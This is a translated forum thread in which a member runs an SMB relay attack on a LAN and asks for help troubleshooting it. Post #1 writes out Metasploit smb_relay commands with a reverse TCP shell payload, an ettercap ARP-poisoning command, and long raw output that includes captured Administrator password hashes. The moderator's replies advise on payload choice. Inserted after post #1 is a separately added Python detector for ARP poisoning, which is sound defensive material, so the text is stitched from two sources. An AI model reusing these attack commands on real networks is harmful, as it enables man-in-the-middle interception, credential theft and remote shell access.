Remote Exploit Forums

#1 (permalink)
10-31-2009, 11:20 PM
New Member
Join Date: Oct 2009
Posts: 6
[problem] Windows SMB_Relay_Exploit

Hello, and congratulations on the forum; one in Italian was really needed.
So, after reading up a lot on this type of attack, I wanted to put what I had learned into practice (on my own LAN), and to tell the truth I did not run into any big problems...
I run etterfilter: etterfilter smb.filtr -o smb.ef
and create the filter smb.ef

After going through the whole procedure, I launched the Metasploit framework like this:
Code:
msf > use windows/smb/smb_relay
msf exploit(smb_relay) > set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
msf exploit(smb_relay) > set LHOST 192.168.1.101
LHOST => 192.168.1.101
msf exploit(smb_relay) > exploit
and it answers like this:
Code:
[*] Started reverse handler
[*] Server started.
then I launch ettercap:
Code:
ettercap -T -q -F smb.ef -M ARP /192.168.1.219/ // -P autoadd -i wlan0
which answers like this:
Code:
ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Content filters loaded from smb.ef...
Listening on wlan0... (Ethernet)

 wlan0 ->	00:21:5C:5B:78:3D     192.168.1.101     255.255.255.0

Privileges dropped to UID 0 GID 0...

  28 plugins
  39 protocol dissectors
  53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services

Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
* |==================================================>| 100.00 %

2 hosts added to the hosts list...

ARP poisoning victims:

 GROUP 1 : 192.168.1.219 00:21:00:A7:73:2C

 GROUP 2 : ANY (all the hosts in the list)
Starting Unified sniffing...


Text only Interface activated...
Hit 'h' for inline help

Activating autoadd plugin...

Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.
SMB : 192.168.1.219:445 -> USER: Administrator  HASH: Administrator:"":"":314BB7C384593DD443F91FEAF2326D43AF1A88BDA1960CD3:4DA5D30CAAD1D1E4BBCEC8B6693C400B5E1D9473424237D4:FD43469EB47B7334 DOMAIN: ROSA-05AA89B2DC
Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.
zapped Accept-Encoding!
Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.
SMB : 192.168.1.219:445 -> USER: Administrator  HASH: Administrator:"":"":333A14003623CB05F891582CC563BFF2E93C97CB73DAA14E:478D5B65AACA953D89FB93B35C8A4584D3A672CD85789227:07E53BAB55E2A30C DOMAIN: ROSA-05AA89B2DC
zapped Accept-Encoding!
Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.
SMB : 192.168.1.219:445 -> USER: Administrator  HASH: Administrator:"":"":B61EE890E9CB128759B3811A16AE0E2BD06512E74987045E:F7D041DC3A3EB9DA7F51B73F62302290F7C87DF97CB20906:669576B1CB6139DE DOMAIN: ROSA-05AA89B2DC
SMB : 192.168.1.219:445 -> USER: Administrator  HASH: Administrator:"":"":767E2FE48A98D3584DE30B198B245376C9B72C77AD71DA80:1B832A99DA71AC94DBE2B6A36B8658F422CF0723B08B124B:80EE4F0BBE043EB2 DOMAIN: ROSA-05AA89B2DC


while in the shell where I launched Metasploit it answers in this other way:
[*] Received 192.168.1.219:1083 \ LMHASH:00 NTHASH: OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1
[*] Sending Access Denied to 192.168.1.219:1083 \
[*] Received 192.168.1.219:1083 ROSA-05AA89B2DC\Administrator LMHASH:51fc5aa9fa03b225c554178c8e3d26165a4d84307fea1452 NTHASH:1f8d89cf41613d62a722874989f8071df2ee1436e73db7aa OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1
[*] Authenticating to 192.168.1.219 as ROSA-05AA89B2DC\Administrator...
[*] AUTHENTICATED as ROSA-05AA89B2DC\Administrator...
[-] FAILED! The remote host has only provided us with Guest privileges. Please make sure that the correct username and password have been provided. Windows XP systems that are not part of a domain will only provide Guest privileges to network logins by default.
[*] Sending Access Denied to 192.168.1.219:1083 ROSA-05AA89B2DC\Administrator
[*] Received 192.168.1.219:1088 \ LMHASH:00 NTHASH: OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1
[*] Sending Access Denied to 192.168.1.219:1088 \
[*] Received 192.168.1.219:1088 ROSA-05AA89B2DC\Administrator LMHASH:314bb7c384593dd443f91feaf2326d43af1a88bda1960cd3 NTHASH:4da5d30caad1d1e4bbcec8b6693c400b5e1d9473424237d4 OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1
[*] Authenticating to 192.168.1.219 as ROSA-05AA89B2DC\Administrator...
[*] AUTHENTICATED as ROSA-05AA89B2DC\Administrator...
[-] FAILED! The remote host has only provided us with Guest privileges. Please make sure that the correct username and password have been provided. Windows XP systems that are not part of a domain will only provide Guest privileges to network logins by default.
[*] Sending Access Denied to 192.168.1.219:1088 ROSA-05AA89B2DC\Administrator
[*] Received 192.168.1.219:1090 \ LMHASH:00 NTHASH: OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1
[*] Sending Access Denied to 192.168.1.219:1090 \
[*] Received 192.168.1.219:1090 ROSA-05AA89B2DC\Administrator LMHASH:333a14003623cb05f891582cc563bff2e93c97cb73daa14e NTHASH:478d5b65aaca953d89fb93b35c8a4584d3a672cd85789227 OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1
[*] Authenticating to 192.168.1.219 as ROSA-05AA89B2DC\Administrator...
[*] AUTHENTICATED as ROSA-05AA89B2DC\Administrator...
[-] FAILED! The remote host has only provided us with Guest privileges. Please make sure that the correct username and password have been provided. Windows XP systems that are not part of a domain will only provide Guest privileges to network logins by default.
[*] Sending Access Denied to 192.168.1.219:1090 ROSA-05AA89B2DC\Administrator
[*] Received 192.168.1.219:1094 \ LMHASH:00 NTHASH: OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1
[*] Sending Access Denied to 192.168.1.219:1094 \
[*] Received 192.168.1.219:1094 ROSA-05AA89B2DC\Administrator LMHASH:69eef1310ae7f64ffd17c6cd0caaffa57fcf27a367bfb8c2 NTHASH:400902aab37704d33435c211d85a4dff5bf9a3056bf6d709 OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1
[*] Authenticating to 192.168.1.219 as ROSA-05AA89B2DC\Administrator...
[*] AUTHENTICATED as ROSA-05AA89B2DC\Administrator...
[*] Sending Access Denied to 192.168.1.219:1101 ROSA-05AA89B2DC\Administrator
[*] Received 192.168.1.219:1105 \ LMHASH:00 NTHASH: OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1
[*] Sending Access Denied to 192.168.1.219:1105 \
[*] Received 192.168.1.219:1105 ROSA-05AA89B2DC\Administrator LMHASH:767e2fe48a98d3584de30b198b245376c9b72c77ad71da80 NTHASH:1b832a99da71ac94dbe2b6a36b8658f422cf0723b08b124b OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1
[*] Authenticating to 192.168.1.219 as ROSA-05AA89B2DC\Administrator...
[*] AUTHENTICATED as ROSA-05AA89B2DC\Administrator...
[-] FAILED! The remote host has only provided us with Guest privileges. Please make sure that the correct username and password have been provided. Windows XP systems that are not part of a domain will only provide Guest privileges to network logins by default.
[*] Sending Access Denied to 192.168.1.219:1105 ROSA-05AA89B2DC\Administrator
[*] Received 192.168.1.219:1107 \ LMHASH:00 NTHASH: OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1
[*] Sending Access Denied to 192.168.1.219:1107 \
[*] Received 192.168.1.219:1107 ROSA-05AA89B2DC\Administrator LMHASH:98c0c5fbfb87fbc3adb95b2db6578a4445e3345fc51f587c NTHASH:53f951431ed067d70f98715c319c186756a774e23f01b989 OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1
[*] Authenticating to 192.168.1.219 as ROSA-05AA89B2DC\Administrator...
[*] AUTHENTICATED as ROSA-05AA89B2DC\Administrator...
[-] FAILED! The remote host has only provided us with Guest privileges. Please make sure that the correct username and password have been provided. Windows XP systems that are not part of a domain will only provide Guest privileges to network logins by default.
[*] Sending Access Denied to 192.168.1.219:1107 ROSA-05AA89B2DC\Administrator
[*] Received 192.168.1.219:1109 \ LMHASH:00 NTHASH: OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1
[*] Sending Access Denied to 192.168.1.219:1109 \
[*] Received 192.168.1.219:1109 ROSA-05AA89B2DC\Administrator LMHASH:3f054f5f7de50f747787772ef1ff004d726ea4b233e2014b NTHASH:8a5c477a0e529d542b4aa2b6eadf4a3887928bb03804ef9d OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1
[*] Authenticating to 192.168.1.219 as ROSA-05AA89B2DC\Administrator...
[*] AUTHENTICATED as ROSA-05AA89B2DC\Administrator...
basically it says that the remote host has only provided us with the client's privileges. Please make sure that the correct username and password have been provided. Windows XP systems that are not part of a domain give only the client's network login privileges by default.
What does it mean? How do I fix it so that the attack completes?
THANKS TO EVERYONE ...

Last edited by brigante; 11-01-2009 at 08:31 AM.
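
Seen from the defender's side, the `-M ARP` step in the post above shows up on the wire as one MAC address suddenly answering for other hosts' IPs. The following is an added example, not part of the original thread: a minimal detector run over constructed ARP observations, where the gateway 192.168.1.1 and its MAC are assumed values and the other addresses are the ones in the ettercap output.

```python
from collections import defaultdict

# Constructed ARP reply observations: (timestamp_s, sender_ip, sender_mac).
# 192.168.1.101 / 00:21:5C:5B:78:3D and 192.168.1.219 / 00:21:00:A7:73:2C
# appear in the ettercap output; the gateway entry is an assumed value.
OBSERVATIONS = [
    (0.0, "192.168.1.1", "00:11:22:33:44:55"),
    (0.5, "192.168.1.219", "00:21:00:A7:73:2C"),
    (1.0, "192.168.1.101", "00:21:5C:5B:78:3D"),
    (9.0, "192.168.1.1", "00:21:5C:5B:78:3D"),    # poisoned reply
    (9.1, "192.168.1.219", "00:21:5C:5B:78:3D"),  # poisoned reply
    (19.0, "192.168.1.1", "00:21:5C:5B:78:3D"),   # re-poisoning keeps repeating
]


def detect_arp_poisoning(observations):
    """Return a sorted list of (kind, ip, mac) alerts.

    'rebind'   : an IP first seen with one MAC is later claimed by another.
    'multi-ip' : one MAC claims more than one IP. Multihomed hosts and
                 proxy ARP also trigger this, so treat it as a lead only.
    """
    ip_to_mac = {}                 # first binding seen per IP (the baseline)
    mac_to_ips = defaultdict(set)  # every IP each MAC has claimed so far
    alerts = set()
    for _ts, ip, mac in sorted(observations):
        mac = mac.lower()
        baseline = ip_to_mac.setdefault(ip, mac)
        if baseline != mac:
            alerts.add(("rebind", ip, mac))
        mac_to_ips[mac].add(ip)
        if len(mac_to_ips[mac]) > 1:
            alerts.add(("multi-ip", ip, mac))
    return sorted(alerts)


def impersonated_by(alerts):
    """Group 'rebind' alerts as {suspect_mac: [impersonated IPs]}."""
    grouped = defaultdict(list)
    for kind, ip, mac in alerts:
        if kind == "rebind":
            grouped[mac].append(ip)
    return {mac: sorted(ips) for mac, ips in grouped.items()}


if __name__ == "__main__":
    for alert in detect_arp_poisoning(OBSERVATIONS):
        print(alert)
```

The baseline here is simply the first binding seen; a real monitor would seed it from DHCP leases or static inventory so that an attacker who is first on the wire does not become the baseline.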

#2 (permalink)
11-01-2009, 08:29 AM
brigante
Moderator
Join Date: Aug 2007
Location: Italy
Posts: 518

once again, read the rules: you opened 2 posts for the same question. When you have to post code, use the CODE tags
__________________
brigante~

#3 (permalink)
11-01-2009, 11:17 AM
New Member
Join Date: Oct 2009
Posts: 6

Sorry brigante, so can you tell me what this error is due to:
Code:
[-] FAILED! The remote host has only provided us with Guest privileges. Please make sure that the correct username and password have been provided. Windows XP systems that are not part of a domain will only provide Guest privileges to network logins by
THANKS

#4 (permalink)
11-01-2009, 02:37 PM
brigante
Moderator
Join Date: Aug 2007
Location: Italy
Posts: 518

just translate it, and check whether the payload is the right one

maybe also read the PDF published on pool.backtrack.it in the relevant section.
__________________
brigante~

#5 (permalink)
11-01-2009, 07:08 PM
New Member
Join Date: Oct 2009
Posts: 6

The PAYLOAD I used was this one: set PAYLOAD windows/shell_reverse_tcp. I configured it, but I don't know why it gives me this error; it says: the remote host has only provided us with the client's privileges. Please make sure that the correct username and password have been provided
From what I could understand, maybe my other PC (the one I carried out the attack on) is patched against this type of attack, but I need to understand why. I would be grateful to everyone for helping me understand this error, thanks..
Nice PDF, with a well-done and very clear explanation...

#6 (permalink)
11-01-2009, 08:05 PM
brigante
Moderator
Join Date: Aug 2007
Location: Italy
Posts: 518

indeed, I told you to read the PDF because it describes that:

Code:
windows/shell/reverse_tcp
and

Code:
windows/shell_reverse_tcp
are two different payloads, which must be chosen according to the patch level of the victim system.
__________________
brigante~

#7 (permalink)
11-02-2009, 02:49 AM
New Member
Join Date: Oct 2009
Posts: 6

nothing, I also tried with:
Code:
windows/shell/reverse_tcp
it always gives me the same error
Sorry, for this type of attack, does the victim's PC have to have shared folders or not....
THANKS

#8 (permalink)
11-02-2009, 11:34 AM
brigante
Moderator
Join Date: Aug 2007
Location: Italy
Posts: 518

Quote:
Sorry, for this type of attack, does the victim's PC have to have shared folders or not....
these are things you have to know yourself, even before choosing the exploit.
__________________
brigante~

#9 (permalink)
11-02-2009, 02:09 PM
New Member
Join Date: Oct 2009
Posts: 6

What does that mean? I'm asking you because you are more experienced, because I did not create any share on the PC I attacked.... and I was asking you, given that this metasploit exploits sharing, whether it is precisely this that causes this error, or am I wrong..

All times are GMT.